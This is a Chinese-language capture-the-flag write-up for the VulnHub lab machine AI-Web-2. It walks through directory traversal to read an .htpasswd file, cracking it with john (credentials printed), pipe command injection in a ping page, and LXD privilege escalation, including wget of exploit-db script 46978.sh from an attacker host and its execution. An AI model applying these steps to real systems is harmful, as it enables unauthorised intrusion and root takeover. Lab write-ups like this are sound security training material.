下载地址:https://www.vulnhub.com/entry/ai-web-2,357/
和1一样捏,拖入VMware打开,然后用kali扫arp得到靶机的ip地址,然后用nmap扫描端口
开启了80端口和22端口,开启22端口可能就是让我们拿到账户进行ssh了。
同样先去网站康康。
打开后是xuezhuli文件分享系统,但是没有可以点击的按钮。在exploit-db上可以搜到XuezhuLi FileSharing存在目录穿越漏洞,可以进行任意文件读取。
读了一些文件都是没用的,最后读到了apache的认证文件/etc/apache2/.htpasswd
可以看出这是一个用户名和密码,不过密码加密了,我么用john来破解一下,这里用的字典就是题目说明里提到的字典了
字典地址:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leaked-Databases/rockyou-45.txt
用户名为aiweb2admin 密码为c.ronaldo
先尝试进行ssh登录,但是不是。那应该是别的地方的了。又没有头绪了,去扫一下网站目录吧。
扫到一个webadmin目录,而且需要登陆,试一下刚才的账户,成功登录。
查看robots.txt又发现两个目录并且第一个目录是ping命令,立马想到命令注入。试了; & | 发现 | 可以进行命令注入
不过反弹shell和文件上传都失败了,那就翻翻文件吧,但是翻了半天也没翻到有用的,可能有隐藏文件吧
find / -name .*
找到一个可能有账户的文件,查看的到一个账户
这次去ssh应该能登陆力
并且发现当前用户在lxd组,可以利用lxd进行提权
https://blog.csdn.net/qq_45290991/article/details/118436123
先利用kali的searchsploit搜索lxd
然后将此脚本放入apache目录下方便后面wget
cp /usr/share/exploitdb/exploits/linux/local/46978.sh /var/www/html
然后从GitHub库下载构建好的Alpine:
git clone https://github.com/saghul/lxd-alpine-builder.git
cd lxd-alpine-builder
./build-alpine
运行成功后出生成一个新的带有当前日期的tar.gz文件(如果运行失败可以试试开着vpn运行)
然后在靶机中利用wget下载46978.sh以及刚刚生成的tar.gz。
wget http://xxx.xxx.xxx.xxx/46978.sh
然后运行脚本
chmod 777 46978.sh
chmod 777 alpine-v3.17-i686-20230410_2356.tar.gz
./46978.sh -f alpine-v3.17-i686-20230410_2356.tar.gz
可能会爆这样的错误,sed -i "s/\r//" 46978.sh 运行此条命令即可解决。
overover!
6232
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
